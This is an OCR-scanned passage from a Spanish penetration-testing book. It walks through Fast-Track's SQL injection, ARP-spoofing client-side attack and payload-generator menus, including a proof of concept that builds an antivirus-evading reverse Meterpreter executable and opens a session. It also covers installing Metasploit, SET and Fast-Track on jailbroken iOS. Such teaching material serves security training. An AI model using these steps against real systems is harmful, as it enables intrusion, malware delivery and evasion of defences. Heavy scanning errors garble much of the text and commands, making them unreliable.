variables  y  paginas  del  sitio.  De  este  modo  se  puede  realizar  un  ataque  de  inyeccion  SQL  a  traves 
de  este  descubrimiento. 


SQLPwnage  is  a  mass  pwnage  tool  custom  coded  for  Fast-Track.  SQLPwnage  will  attempt 
to  identify  SQL  Injection  in  a  website,  scan  subnet  ranges  for  v/eb  servers,  crawl  entire 
sites,  fuzz  form  parameters  and  attempt  to  gain  you  remote  access  to  a  system.  V/e  use 
unique  attacks  never  performed  before  .in  order  to  bypass  the  64kb  debug  restrictions 
on  remote  Windows  systems  and  deploy  our  large  payloads  without  restrictions. 

This  is  all  done  without  a  stager  to  download  remote  files,  the  only  egress  connections 
made  are  our  final  payload.  Right  now  SQLPwnage  supports  three  payloads,  a  reverse 
tep  shell,  metasploit  reverse  tep  meterpreter,  and  meiasploit  reverse  vne  inject. 

some  additional  features  are,  elevation  to  "sa"  role  if  not  added,  data  execution  prevention! 
(Dtp)  Disabling,  anti-virus  bypassing,  and  much  morel  1 

This  tool  is  the  only  one  of  its  kind,  and  is  currently  still  in  beta. 

SQLPwnage  Main  Menu: 

1.  SQL  Injection  Search/Exploit  by  Binary  Payload  Injection  (BLIND) 

2.  SQL  Injection  Search/Exploit  by  Binary  Payload  Injection  (ERROR  BASED) 

3.  SQL  Injection  single  URL  exploitation 


Fig  7.1 5:  Menu  cle  SQLPwnage. 


mim _ _ _ Metasploit  para  Pentesters 

Mass  Client-Side  Attack 

Esta  funcionalidad  proporciona  al  usuario  la  posibilidad  de  utilizar  un  servidor  web  que  cargue 
distintos  exploits  y  que  estos  sean  lanzados  cuando  una  victima  potencial  se  conecte  al  servidor  web. 
Esta  funcionalidad  es  equivaiente  a  la  tecnica  browser  autopwn,  la  cual  se  utilizaba  en  este  libro  para 
la  distribution  de  malware  en  internet. 

Esta  funcionalidad,  ademas,  permite  realizar  un  ataque  de  ARP  Spoofing  a  la  victima,  si  esta  se 
encontrase  en  el  mismo  segmento  de  red  que  el  atacante.  Con  esta  action  se  busca  edntrolar  la 
comunicacion  de  la  victima.  El  ARP  Spoofing  es  provocado  por  la  utilization  de  Fast-Track  de  la 
herraniienta  Ettercap. 

Would  you  like  to  use  ettercap  to  ARP  poison  a- host  yes  or  no:  yes 

Ettercap  allows  you  to  ARP  poison  a  specific  host  and  when  they  browse 
a  site,  force  them  to  use  the  metasploit  site  and  launch  a  slew  of 
exploits  from  the  Metasploit  repository.  ETTERCAP  REQUIRED. 

What  IP  Address  do  you  want  to  poison:  192.168.8.66 

Fig  7,16:  Configuration  de  A  IIP  Spoofing. 

La  eleccion  del  payload  es  una  situation,  que  como  se  ha  comentado  en  este  libro  en  varias  ocasiones, 
es  reahnente  importante.  Es  ta  funcionalidad  permite  el  egi  r  cuatro  opciones  de  payload,  que  no  dejan 
de  ser  los  mas  conocidos,  e  incluso,  los  mas  utiiizados. 

Specify  your  payload:  ~ 

1.  Windows  Meterpreter  Reverse  Heterpreter 

2.  Generic  Bind  Shell 

3.  Windows  VNC  Inject  Reverse  TCP  (aka  “Da  Gui”) 

4.  Reverse  TCP  Shell 

Enter  the  number  of  the  payload  you  want:  g _ 

Fig  7.17:  Eleccion  de  payload  en  Mass  Client-Side  Ailack. 

Tras  ir  respondiendo  a  las  sencillas  cuestiones  que  produce  Fast-Track  para  configurar  el  ataque 
se  pueden  visuaiizar  dos  ventanas  nuevas,  la  primera  es  la  del  servidor  configurado  y  preparado 
para  recibir  las  peticiones,  y  la  segunda  es  en  la  que  se  realiza  el  ARP  Spoofing,  en  caso  de  haber 
seleccionado  su  configuracion. 


a  v  h  Fast-Track  Custom  HTTP  Server 

|™>l  100.00  J?  .  ■  "  T>‘i  ■- : 

Fast-Trad;  tiass  Client  ftttacl;  Web  Server 

:34  hosts  added  to  the  hosts  list,.. 

Written  bui  David  Kennedy  (ReLllO 

iniitTwnmw  i 

jASP  poisoning  vlctiMsi  .  . 

Starting  HTTP  Server  en  192,168.0,65  port  80 

!;tK  •  -TT 

*4*  Have  sorwone  connect  to  you  on  192,168,0,65  port  BO  ***  ! 

.!  GROUP  2  :  mt  (all  the  hosts  in  the  list) 
j. (Starting  Unified  sniffing,,. 

I  lap®  <control>-c  to  exit,. 


Text  only  Interfiles  activated,,. 
Hit  V  for  Inline  help 


Fig  7.18:  Ventanas  del  ataque  Mass  Client-Side. 
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Exploits 

Esta  funcionalidad  proporciona  un  numero  de  exploits  codeados  en  Python  Esin 
ser  encontrados  en  ia  mte/pentest/explou is/ jwttrack/bin/ exploits.  En  la  imaeen  se  vi 
de  exploits  que  Fast-Track  detecta,  pero  dicha  lista  puede  ser  faciimente  amptiada  ^  ^  ^ ^ 

This  section  will  attempt  to  compile  some  exploits  coded  in  pythonTuenersnr 
these  exploits  are  from  Huts,  but  may  add  others  in  time.  a 

Select  your  exploit: 

1.  HP  OpenView  Network  Node  Manager  CGI  Buffer  Overflow 

2.  IBM  Tivoli  Storage  Manager  Express  CAD  Service  Buffer  Overflow 

3.  HP  Openview  NNM  7.5.1  0VA5.EXE  Pre  Authentication  SEH  Overflow 

4.  Quicklime  7.3  RTSP  SEH  Buffer  Overflow 

5.  Goodtech  SSH  Server  6.4  Buffer  Overflow 

6.  MS0B-9G7  Microsoft  Server  Service  Remote  Buffer  Overflow 

7.  nvlRC  6.34  Remote  Buffer  Overflow  Exploit 

8.  TFTP  Server  for  Windows  VI. 4  ST 

9.  Internet  Explorer  XML  Corruption  Buffer  Overflow 

IB.  MS  internet  Explorer  7  Memory  Corruption  Exploit  (MSO9-0Q2)  . 

11.  MS  Internet  Explorer  7  DirectShow  (msvidctl.dll)  Heap  Spray 

12.  FireFox  3.5  Heap  Spray  Vulnerability 


Enter  number: 


Fig  7.19:  Listado  de  exploits  por  defeclo  que  presenta  Fast-Track. 

Fast-Track  proporciona  para  el  exploit  que  se  qiiiera  configurar  tin  sencillo  paso  a  paso  para 
configurado.  Gracias  a  esto,  el  usuario  puede  preparar  un  entorno  de  prueba  para  comnrobar  la 
eftciencia  del  exploit  en  un  rango  temporal  inferior  a  la  configuracion  manual  del  modulo  del  exuloit 
con  Metasploit .  ' 1 


Binary  to  Hex  Payload  Converter 

El  conversor  de  binario  a  hexadecimal  que  presenta  Fast-Track  permite  generar  las  instruceiones  en 
hexadecimal,  siempre  y  cuando  el  archivo  ejecutable  se  encuentre  por  clebajo  de  64  kb  de  tamano 
Este  conversor  se  puede  utilizar  cuando  el  atacante  ya  tiene  acceso  a  un  sistema  comproraetido  v  se 
necesita  enviar  un  ejecutable.  "  * 

General mente,  los  puertos  de  FTP  y  otros  protocols  de  transferencia  de  archives  se  encuenlran 
filtrados  por  los  cortafiiegos,  por  lo  que  este  metodo  proporciona  una  manera  altemativa  de  lonnr 
este  objetivo.  c 

Fast-Track  dispone  de  la  option  del  conversor  y  devuelve  un  archivo  de  texto  con  el  formato 
especifico  de  depuracion  de  sistemas  Windows.  Este  archivo  es  el  que  reconstruira  el  ejecutable  una 
vez  que  se  encuentre  en  el  sistema  de  la  victima  o  en  la  nmquina  fisica. 

Una  vez  logrado  lo  anterior,  solo  se  tiene  que  pegar  en  una  cmd o  desarroilar  un  script  para  conseguir 
ejecutar  esto  en  eJ  sistema  afectado  del  cual  ya  se  provela  de  acceso.  " 


Fayload  Generator 

La  funcionalidacl  de  Payload  Generator  es  comun  en  distintas  liemimientas  que  utiliznn  e! 
framework  de  Metasploit,  por  ejemplo  en  SET.  Social  Engineering  Toolkit.  Este  generadoi  de 
payload  ejecutables  o  s hellcodes  ayuda  de  manera  sencilla  al  usuario  a  lograr  archivos  ejecutables, 
encodeados  para  intentar  evitar  antivirus,  IPS  o  IDS,  o  incluso  obtener  el  codigo  o  shellcode  para 
utilizar  en  exploits  propios. 

Fast-Track  presen  tar  a  al  usuario  distintos  menus  de  navegacion  con  ciertas  preguntas,  como  son  la 
election  del  payload ,  la  election  del  encoder  o  si  se  quiere  crear  un  listener  a  traves  del  modulo  de 
Metasploit  exploit/multi/handler. 

PoC:  Generation  de  payload  eon  Fast-Track 

Ei  escenario  de  la  siguiente  prueba  de  concepto  es  una  recopilacion  de  Jo  estudiado  o  coinentado 
anteriormente  en  este  libro.  El  atacante  utilizara  la  herramienta  Fast-Track  para  generar  tin  payload 
de  lipo  ejecutable,  el  cual  sera  enviado  a  las  potenciales  victimas  a  traves  de  algun  medio  telematico. 
Este  medio  se  deja  a  la  imagination  del  lector,  siendo  posibles  eandidatos,  el  correo  electionico,  un 
servidor  web  mediante  enlace  a  un  recurso  malicioso,  un pendrive  entregado  a  las  victimas,  etcetera. 

Fast-Track  proporciona  un  menu  con  distintas  funcionalidades,  la  opcion  .Payload  Generator 
mostrara  las  cuestiones  que  deben  ser  respondidas  por  el  usuario. 

Fast-Track  Main  Menu: 

1.  Fast-Track  Updates 

2.  Autopwn  Automation 

3.  Nmap  Scripting  Engine 

4.  Microsoft  SOt  Tools 

5.  Mass  Client-Side  Attack 

6.  Exploits 

7.  Binary  to  Pex  Payload  Converter 

8.  Payload  Generator 

9.  Fast-Track  Tutorials 
IB.  Fast-Track  cliangelog 

11.  Fast-Track  credits 

12.  Exit  Fast-Track 

Enter  the  number:  fig 

Fig  7.21 :  Efecci6n  tie  la  opcion  Payload  Generator. 
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En  la  eleccion  del  payload  sepodra  elegir  entre  los  ciasicos  Meterpreter,  shell,  etcetera.  Para  esu 
prueba  de  concepto  se  etige  la  opcion  de  Meterpreter,  el  cual  es  denominado  “el  rey  de  los  payloads  i 


What  payload  do  you  want  to  generate: 


1.  Windows  Shell  Reverse  TCP 


Description:  v 

Spawn  a  command  shell  on  victim  and  send  back  to  attack 


2.  Windows  Reverse  TCP  Meterpreter  Spawn  a  meterpreter  shell  on  victim  and  send  hack  to  at 
tacker. 

3.  Windows  Reverse  TCP  VNC  DLL  Spawn  a  VNC  server  on  victim  and  send  back  to  attacker. 

4.  Windows  Bind  Shell  Execute  payload  and  create  an  accepting  port  on  remote 

system. 

<ctrl>-c  to  Cancel 

Enter  choice  (example  1-6):  1 _ _  _ 

Fig  7.22:  Elecci6n  del  payload  para  ei  archive  Final. 

Tras  la  eleccion  del  payload,  Fast-Track  muestra  las  ogcion.es  que  se  pueden  utilizar  para  oluscar  <7 
encodear  el  archive  ejecutable,  con  el  fin  de  evadir  a  los  posibles  sistemas  de  antivirus,  por  ejempldf 

El  encoder  utilizado  en  esta  prueba  es  Shikaia jga  nai,  el  cual  realizara  cuatro  iteraciones  sobre  I 
codigo  del  payload.  Este  encoder  genera  buenos  resultados  en  la  Iucha  contra  la  evasion  de  sistemaj 
cle  protection. 


Below  is  a  list  of  encodings  to  try  and  bypass  AV. 

Select  one  of  the  below,  Avoid_UTF8_tolower  usually  gets  past  them. 

1 .  avoid  utf B  tolower 

2.  shikataganai 

3.  alpha  jnixed 

4.  alphaupper 

5.  call4_dword_xor 
fi.  countdown 

7.  fnstenv  mov 

8.  jmp_c3lT_additive 

9 .  nonalpha 
16 .  nonupper 

11.  Unicode  mixed 

12.  unicode_upper 

13.  alpha 2 

14.  Ho  Encoding 

Enter  your  choice  :  2 _ _ _ _ 

Fig  7.23:  Eleccion  del  encoder  para  el  archivo  final; 

Por  ultimo,  y  antes  de  realizar  el  despl  iegue  del  fichero  mediante  el  uso  de  algun  a  via  de  comunicaciol 
mencionada  anteriormente,  se  debe  responder  a  titias  cuestiones.  Fast-Track  permite  que  el  cocligd( 
que  se  genere  sea  para  inyectarlo  en  un  exploit  que  se  este  desarrollando,  por  ejemplo  mediante  una 
shellcode.  Otra  opcion  es  crear  un  ejecutable  donde  se  encuentre  el  payload  que  se  quiere  utilizaiv 
En  esta  prueba  de  concepto  se  ha  utilizado  la  segunda  opcion,  que  consiste  en  la  creation  de  ul 
ejecutable  con  inyeccion  de  payload. 
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Enter  IP  Address  of  the  listener/attacker  {reverse)  or  host/victin  (bind  shell):  192.168.1.3 

8 

Enter  the  port  of  the  Listener:  4444 
Do  you  want  to  create  an  EXE  or  Shellcode 

1.  Executable 

2.  Shellcode 

Enter  your  choice:  l 

/bin/sh:  /pentest/exploits/f ramework3/sisfpayload:  No  such  file  or  directory 

A  payload  has  been  created  in  this  directory  and  is  named  ‘payload.exe'.  Enjoy! 

Do  you  want  to  start  a  listener  to  receive  the  payload  yes  or  no:  no 
Fig  7.24:  Configuration  del  payload. 

Bn  esta  prueha  se  puede  vistializar  como  Fast-Track  pregunta  ai  usuario  si  qn i ere  montar  y  configurar 
un  listener  para  recibir  ias  sesiones  inversas.  Si  el  usuario  elige  “si”,  entonces  se  ej ec uia ri a  Metasploit 
y  se  configuraria  automaticamente  el  handler.  En  esta  ocasion  se  ha  deeidido  responder  con  “no”  a 
la  pregunta  de  Fast-Track  y  configurer  manuaimente  el  m6du!o  exploit/multi/handler. 


1*1  Sending  stage  (752128  bytes)  to  192.168.1.40 

{*]  Heterpreter  session  1  opened  (192.168.1.41:4444  ->  192.168.1.40:1561)  at  2012-09-2B  21:32:44  j 
<•0280 


ter  >  getuid 
{Server  username:  PRUEBAS-01766CC\Administrador 
peterpreter  > 


Fig  7.25:  Oblencion  de  sesion  in  versa  en  la  maquina  remola. 


6.  Conciencia  sobre  Fast-Track 

En  deilnitiva  Fast-Track  es  una  herramienta  de  automatizacion  que  ofrece  una  gran  cantidad  de 
posibilidades,  gracias  a  la  riqueza  que  aporta  Metasploit  Framework.  Fast-Track  se  combina  con 
Metasploit  para  permitir  al  usuario  menos  avanzado  utilizar  y  configurar  de  manera  sencilla  vectores 
de  ataque  con  los  que  poder  compromeler  maquinas  remotas. 

Cabe  destacar  que  los  vectores  de  ataque  automatizados  no  siempre  tienen  exito.  Esta  afirmacion  es 
logica,  ya  que  un  vector  de  ataque  es  una  via  o  posibilidad  para  acceder  o  tomar  el  control  de  una 
maquina  remota.  Hay  que  entender  lo  que  realmente  esta  realizando  el  sistema  que  esta  atacando  a 
la  maquina  victkna.  Tambien  es  interesante  entender  cuantas  posibilidades  de  exito  tiene  el  vector 
de  ataque  antes  de  lanzarlo. 

En  conclusion,  Fast-Track  ayuda  a  preparar  el  entorno  en  un  tiempo,  casi  record,  de  tres  minutos 
o  menos.  Pero,  puede  ocurrir  que  la  capacidad  para  reatizar  pruebas  de  forma  manual  produzcan 
mejores  resultados  en  el  sistema  remoto,  por  lo  que  no  hay  que  dejar  de  lado  las  pruebas  manuales, 
ni  dejar  de  entender  lo  que  esta  sucediendo  sin  que  el  usuario  sea  consciente  de  ello,  “por  debajo”. 


CapUulo  VII.  Mas  alia  con  Fast-Track 


1.  Reflexion  sobre  herramientas  externas  a  Metaspj0jt 

En  estos  dos  ultiinos  capitulos  se  han  estudiado  y  ejemplificado,  mediante  la  escenjplCaci6n  de 
pruebas  de  concepto,  dos  de  las  herramientas  mas  conocidas  para  automatizar  (areas  eon  ej  objetivo 
de  realizar  una  intrusion  en  un  sistema. 


Como  se  ha  podido  estudiar  Fast-Track  y  SET  o  Social  Engineering  Toolkit  son  dos  hcrramieiUas 
muy  dislintas,  pero  con  un  denominador  comun  que  es  Metasploit .  Arnbas  herramientas"  uiilizan  ia 
versatilidad  del  framework  para  generar  un  mttndo  fa  Iso,  ya  sea  por  medio  de  sitios  web  ejecu  tables 
que  no  haeen  lo  que  parece,  correos  electronicos  que  parecen  reales  y  no  lo  son,  etcetera 

En  el  tntindo  lalso  que  este  tipo  de  aplicaciones  son  capaces  de  crear,  la  viclima  debe  tener  mueho 
cuidado  ya  que  esta  acluara  como  si  fuera  un  mundo  real.  De  esta  manera  se  provoca  que  \a  viclima 
ejecute  archivos  que  no  deba,  visile  sitios  que  no  son  reales  o  confie  en  correos  electronicos  que  no 
son  los  adecuados. 


Estadisticamente  SET  es  mas  utiiizado  en  el  mundo  de  los  test  de  intrusion  que  Fast-Track.  Este 
hecho,  puede  ser  el  resultado  del  objetivo  con  el  que  se  desarrollo  SET  y  ias  funcionalidades  de 
ingenieria  social  que  este  aporta  al  usuario  que  lo  utiliza.  Fast-Track  tiene  un  objetivo  enfocado  a 
facilitar  al  usuario  la  interaccion  y  configuracion  de  ataques  avanzados  de  Metasploit.  SET  tambien 
proporciona  metodos  para  configurar  algunos  ataques  avanzados,  pero  siempre  enfocado  ai  arte  de 
la  ingenieria  social. 

Por  ultimo  comentar  que  la  automatizacion  es  necesaria  y  reeomendable,  pero  esta  tambien  tiene 
cosas  negativas  como  es  la  perdida  de  control  sobre  lo  que  esta  sucediendo.  Todas  las  acciones  que 
proponen  SET  y  Fast-Track  se  pueden  realizar  sin  la  automatizacion,  es  decir,  manuaimente.  En 
general  es  reeomendable  utilizar  la  automatizacion  cuando  el  usuario  conozca  muy  bien  el  proceso 
manual  y  por  esta  razon  es  importante  conocer  las  operaciones  que  se  estan  utilizando  por  debajo, 
que  en  el  caso  de  Fast-Track,  esto  se  traduce  en  conocer  bien  el  entorno  de  Metasploit  Framework. 

Como  se  ha  podido  estudiar  en  estos  dos  capitulos,  Metasploit  puede  ser  la  semilla  de  un  test  de 
intrusion,  provocando  que  gran  cantidad  de  pruebas  y  procesos  se  puedan  impiementar  gracias  al 
framework. 


Capitulo  VIII.  Metasploit  en  dispositivos  moviles 


Capitulo  VIII 

Metasploit  en  dispositivos  moviles 


1.  Introduccion 

A  bo  rd  ar  el  tenia  tie  Metasploit  y  los  dispositivos  moviles  es  un  asunto  que  se  puede  afrontar  desde 
diferentes  puntos  de  vista.  Los  dispositivos  moviles  como  iPhone  o  iPad  con  iOS  o  Android,  piteden 
encontrarse  en  arnbos  lados.del  espejo,  es  decir,  pueden  sertanto  los  uti  lizados  por  t\pentester  como 
los  uti  lizados  por  la  vfetima  y  en  arnbos  cases  puede  ser  vital  conocer  st.  funcionamiento  para  poder 
sacar  el  maxiino  provecho  de  ellos. 

Desde  el  piinto  de  vista  del  pen! ester,  poder  d  isponer  de  un  framework  como  Metaspl  oit  instalado 
en  un  terminal  movil  puede  perniitir  que  se  este  realizando  todo  un  test  do  intrusion  desde  la  WiFi 
de  la  empresa,  mientras  se  esta  esperando  en  la  sala  de  espera  o  paseando  por  las  instalaciones  en 
1.11a  visita  guiada.  De  hecho,  en  las  instalaciones  de  alta  seguridad  todos  los  dispositivos  moviles 
se  encuentran  mas  que  prohibidos  por  este  tipo  de  motivos,  y  todos  Ips  visitantes  deben  dejarlos 
encerrados  en  iiiias  cajas  de  seguridad  a  la  entrada  que  actuan  como  jaiilas  de  Faraday.  Por  otro  lado 
cada  vez  es  mas  coniun  que  tin  dispositive  movil  guarde  informacion  sensible  de  un  objetivo  que  no 
esta  dtspomble  en  otro  lugar,  por  lo  que  puede  ser  necesario  atacar  uri  terminal  Android  o  iOS  para 
obtener  diclia  informacion  y  sacar  esos  datos.  No  hay  que  perder  de  vista  que  CEOs  de  empresa 
politicos  y  hasta  jueces,  util izan  sus  iPads,  por  ejemplo,  para  trabajar  diariamente. 

Atacar  los  datos  de  cstos  termmales  se  puede  enfocar  desde  tres  aproximaciones  distintas,  para  las 
que.  es  necesario  trazar  diferentes  planes  de  trabajo. 

-  La  primera  de  las  aproximaciones  seria  atacar  el  terminal  con  un  exploit  remoto  del 
mismo.  que  permiliera  tomar  control  del  terminal  y  obtener  una  shell  o  instalar  un  troyano 
para  controlar  el  equipo. 

La  segunda  de  ellas  seria  atacar  las  comunicaciones  del  terminal  aprovechando  conexiones 
a  traves  de  redes  inseguras  del  dispositivo,  ya  sean  redes  WiFi  o  de  comunicaciones  GPRS, 
Dentro  de  estos  ataques,  tambien  es  conveniente  liacer  notar  el  impacto  de  los  aiaques  de 
Mice  Jacking  para  robur  fotografias  y  videos  de  la  tarjeta  de  memoria  de  los  dispositivos. 

La  ultima  consiste  en  atacar  el  backup  del  terminal  que  puede  haberse  hecho  en  una 
maquina  insegura  o  en  iCloud,  algo  que  permitiria  acceder  a  los  datos  del  equipo  en  la  nube 
lo  que  haria  posible  obtener  datos  de  extrema  sensibilidad  del  usuario. 


A  lo  largo  de  esie  capitulo  se  van  a  comenlar  las  diferentes  aproximaeiones  utilizando  Metasploit 
co mo  herramienta  de  apoyo  donde  sea  posible. 


2.  Instalacion  de  Metasploit  en  dispositivos  iOS 

A  continuacion  se  explieara  la  manera  de  instaiar  el  framework  de  Metasploit  en  tin  dispositivo 
movil  como  iPhone  para  poder  auditor  desde  cuatquier  higar.  El  requisite  a  la  hora  de  reaiizar 
este  proceso  es  disponer  de  un  dispositivo  iOS  con  jailbreak,  ya  que  no  se  pueden  conseguir  estas 
herramientas  por  los  canales  habituaies. 


Requisites  previos  e  instalacion 

Se  debe  coneelar  de  algun  modo  con  el  iPhone  para  poder  reaiizar  las  operaciones  necesarias  para 
la  instalacion  de  Metasploit.  La  via  mas  recomendable,  segura  y  comoda  es  conectarse  mediante  un 
terminal  SSH,  ya  sea  en  el  mismo  dispositivo  escribiendo  comandos  eon  el  iPhone,  o  utilizandolo 
en  Mac  OS  X,  Linux  o  Windows . 

En  este  ejemplo  se  ha  utilizado  ei  terminal  Putty,  que  sera  eon  el  que  se  reaiizara  la  instalacion 
complete  y  ei  principal  manejo  de  Metasploit.  En  caso  de  tener  instalado  OpenSSH  en  un  dispositivo 
iPhone,  siempre  es  ideal  tenerlo  bien  fortificado.  Una  vez  realizada  la  conexion  mediante  SSH,  se 
procedera  a  la  instalacion  de  los  paqueles  y  aplicaciones  necesarias  para  la  instalacion  de  Metasploit 
y  SET. 

Para  poder  proceder  con  el  proceso  de  instalacion  de  Metasploit  es  necesario  cumplir  los  requisitos 
previos  de  los  componentes.  Por  ello,  se  instalaran  aplicaciones  necesarias,  que  son:  subversion, 
nano ,  wget  y  phyton. 

En  las  siguientes  capturas  se  observan  las  instrucciones  a  ejecutar  para  instaiar  los  distintos 
componentes: 

iPhone-de-Pablo-Gonzalez : /private/var  root#  apt-gee  install  suversion  nano  wget 

pythonj _ _ _ _ ___________ 

Fig  8.0 1 :  Instalacion  de  subversion,  nano  y  wget. 


[IPhone-de-Pablo-Gonzalez :/var /mobile  root#  cd  /private/var/| 
Fig  8.02:  Eleccion  de  punto  de  descarga  de  Metasploit  en  Iprivale/var. 


A  continuacion,  y  una  vez  situados  en  el  directorio  de  descarga  seleccionado,  se  proceda  a  descargar 
el  paquete  ruby.  Esto  se  reaiizara  mediante  el  prograrna  wget  que  se  desempaquetara  e  instate™  con 
el  comando  dpkg  -i. 
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^rubvd!"nini?rrleH:/private/vac  cooc* H9et  http  :77«>c ■ 

bs,  Euby^l . 8 . 6-plll-5_iphoneo3-arm . deb 

-2011-01-04  11:20:06—  http: //ape . saurik . cois/cydia/debs/r  aby  1.8.6-pUl-s  iphe 
fieos-flrre.  deb  ~  —  ^ 

Reserving  ape .saurik. com.  .  .  74.208.10.249 

Connecting  to  apt .saurik. coral  74 . 208 .10.249| :80. . .  connected. 

aTlP  request  sent,  awaiting  response...  302  Moved  Temporarily 

incati°D:  he tp: //cache . saurik.com/debs/ruhy_l . B . 6-plll-5_iphoneo3-arm. den  [folic 

11:20:06""  : //cache . saurik . com/ debs/ ruby  1.8.6-plll-5  ipisuneo- 

Resolving  cache.saOrik.com. . .  93.188.132.17,  93 . 168 . 132 .25 

Connecting  to  cache. saurik. com) 93. 188.132 . 17 | : 80. . .  connected.  4 

HTTP  request  sent,  awaiting  response...  200  OK  | 

Length:  1719310  (1.6M)  {application/octet-streaiaj  _  I 

saving  to:-  ’runy_l  .8. 6-plll -5_iphoneo3-aiBi. deb1  ‘  j 


2Q6K/S  eta 


Fig  8.03:  Descarga  tie  Ruby. 


^-ue-iabio-oonrau./pnvaceyvar  root*  dpkg  -i  ruby_l .  0:^0^1^555=1 

(Reading  database  . . .  8559  files  and  directories  currently  installed  ) 

Preparing  to  replace  ruby  1.8.6-pUl-s  (using  rnby_l. 8. 6-plll-S. iphoneos-arb.Ueb 

Unpack! ng  replacement  ruby  ... 

Setting  up  ruby  (l.8.6-plli-5)  ... 

iPnone-tie-Pabio-Gonzalez: /private/var  root?  § _ 

Fig  8.04:  Desempaquetado  e  instalacion  de  Ruby. 

Despues  se  instala  ruby  gems,  un  componente  necesario  en  Metasploit ,  con  la  aplicacion  apt-get. 

irhone-rte-fablo-Gonzalez:  /private/var  root#  apt-get  install  rubyg^S - ^ 

Heading  package  lists...  Done 
Bui Iding  dependency  tree 
Reading  state  information. . .  Done 
dote,  selecting  ruby  .instead  of  rubygems 
the  following  packages  will  be  upgraded: 
ruby 

1  upgraded,  0  newly  installed,  0  to  remove  and  18  not  upgraded- 
Heed  co  get  0B/3782fcB  of  archives. 

Mter  this  operation,  IS. SMB  of  additional  disk  space  will  be  used 
(Reading  database  ...  8559  files  and  directories  currently  installed.) 

C0  replaCe  ruby  1-8-6-plll-S  (using  .  .  ./ruby_l.S.2-p0-I0_iphoneos-ann. 

Fig  8.05:  Instalacion  de  rubygems. 

Una  vez  que  se  hayan  instalado  todos  los  prerequisites  se  podra  pasar  a  la  lose  de  instalacion  de 
Metasploit,  para  ello,  se  debe  descargar  e  instaiar  el  paquete  .deb  de  Metasploit. 


iPhone  de-Pablo-Gonzalez: /private/var  root*  wget  http://updates.metasploit.eom/d 
a ta/releases/f ramework-3 .5.1. tar .bz2 

—2011-01-04  11:28:42—  http: //updates  .metasploit .  com/data/releases/framework- ^ 
-  5 . 1. tar .bz2 

Resolving  updates .metasploit . com. . .  184 . 154 . 104 . 2 

Connecting  to  updates .metasploit .cora)184. 154. 104 . 2 | :80. . .  connected. 

HTTP  request  sent,  awaiting  response...  200  OK 
Length :  43340987  (41H)  [applies tion/x-bzip2J 
Saving  to:  • framework-3. 5. 1 . tar. bz2 • 

[ . .  1  119,919  54.6K/S  | 


Fig  8.06:  Descarga  del  paquete  Metasploit  con  wget  desde  ia  web  del  proyeclo. 


Como  ejemplo  se  aiiade  ademas  una  imagen  con  ia  instalacion  en  un  iPad. 


Metasploit  para  Pentesters 
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Pig  8.07:  Metasploit  funcionando  enun  iPad. 


Instaladon  del  modulo  SET  (Social  Engineering  Toolkit)  en  iOS 

Para  proceder  con  la  instalacion  de  S.E.T ,  se  debe  cambiar  de  directorio  en  el  dispositivo  movil  y 
situ  arse  de  nuevo  en  la  direction  /private/var.  Una  vez  allf  se  debe  ejeeutar  el  siguiente  toman  do 
para  anadir  el  modulo  SET: 

/private/ var  root#  svn  co  http://svn.trustedsec.com/social  engineering  toolkit. 

set/  “  “ 

Una  vez  realizado  este  paso,  hay  que  situarse  en  el  directorio  SET  y  ejeeutar  la  orden  ./set  aceptando 
la  instalacion  de  todos  los  modulos  de  Python  que  se  requieran.  En  este  memento  ya  estara  preparado 
para  funcionar,  tanto  el  framework  de  Metasploit  como  SET  en  el  dispositivo  iOS. 


iPhone-de-Pablo-Ganialezi/private/var/SET  loot)  ./sec 

■  .HiM.mMtt.mffw 

■  ft. ...if. if . h... 


ii.  . 

. it . 

.  .  ,  \  f  .  .  . 

.nuii.ffffii... 

• • tl.it . 

ft.. 

..u.u . 

...M... 

.m 

ift.mfttff. 

...It... 

I — -1  The  Social. -Ergineai  Toolkit  (SET) 

I ?  Written  by  David  Kennedy  (ReLIK) 

I — ]  Version :  l.l.l 

( — !  Codenaree:  'Happy  Holidays 1 

(  :  Report  bugs  to:  davek03ociai-engiueer.org 

l—  "1  Follow  Me  On  Twitter :  dave_rellk 

i 1  Homepage:  http://www.secmaniBC.qoni 

( —  ]  Framework:  http://www.30cial-engiiieer.org 

Welcome  to  the  Social-Engineer  Toolkit  (SET).  Your  one 
atop  shop  for  all  of  your  social-engineering  needs.. 

Fig  8.08:  SET  ejecutandose  en  un  iPhone. 


Instalar  Fast-Track  en  iOS 

En  iOS  tambien  es  posible  instalar  Fas(-Trac!c.  Para  ello  se  utilizara  subversion  ejecutando  desde  la 
llnea  de  comandos  la  siguiente  orden: 

/private/var  root#  svn  co  http://svn.thepentest.com/fasttrack/ 

A  continuation  habra  que  ejeeutar  el  instalador  con  la  siguiente  orden: 

/private/var  root#  python  setup. py  install 

Fast-Track  realizara  una  serie  de  pregimtas  habituales  del  proceso  de  instalacion  y  una  vez  acabado 
el  proceso  cornpieto,  exsstiran  dos  modulos  para  manejar  Fast-Track,  o  blen  en  modo  de  texto 
interactivo  o  bien  con  una  interfaz  senciila  para  utilizai'  via  web.  Para  arrancar  Fast-Track  en  cada 
modulo  se  ejecuta  la  siguiente  orden: 

/private/var  root#  python  ./fast-track. py  -i  (ejecucibn  mediante  shell) 

/private/var  root#  python  . /fast-track. py  -g  (ejecuci6n  mediante  webfiUI) 

ko.sf-Track  ayuda  a  automatizar  el  proceso  de  pentesting,  formando  parte  del  kit  de  herramientas  de 
auditorla  que  se  puerfen  ejeeutar  desde  un  dispositivo  IOS  para  trabajar  desde  cualquier  lugar. 


3.  Ataques  en 


iOS 


Atacar  el  terminal  con  un  exploit  remoto:  El  caso  de  iOS 

Si  se  busca  en  los  modulos  de  Metasploit,  se  encuentra  que  a  dla  de  hoy  no  hay  ningun  exploit  para 
term  inales  iOS,  con  lo  que  iPad,  iPhone,  Apple  TV y  los  iPod  Touch  quedanan  fuera  de  los  posibles 
targets.  Por  supuesto,  ia  no  existencia  de  eslos  exploits  que  permitan  tomar  control  remoto  de  los 
terminales  Apple  no  quiere  detir  que  scan  invulnerables,  ni  mucho  menos,  es  solo  que  los  exploits 
de  iOS  tienen  un  valor  mucho  mayor  en  la  comunidad  del  jailbreak  y  en  el  mercado  actual,  por  lo 
que  no  aparecen  muchos  publicos. 

La  superficie  de  exposicion  de  un  terminal  iOS  de  Apple  es  bastante  reducida,  y  se  compone  del 
navegador  Mobile  Safari,  el  cliente  de  coiTeo,  el  cliente  SMS,  los  plugins  que  se  puedan  cargar  en 
estas  apiicaciones  y  poco  mas.  El  resto  de  aplicaciones  utilizan  peticiones  de  conexion  at  sistema 
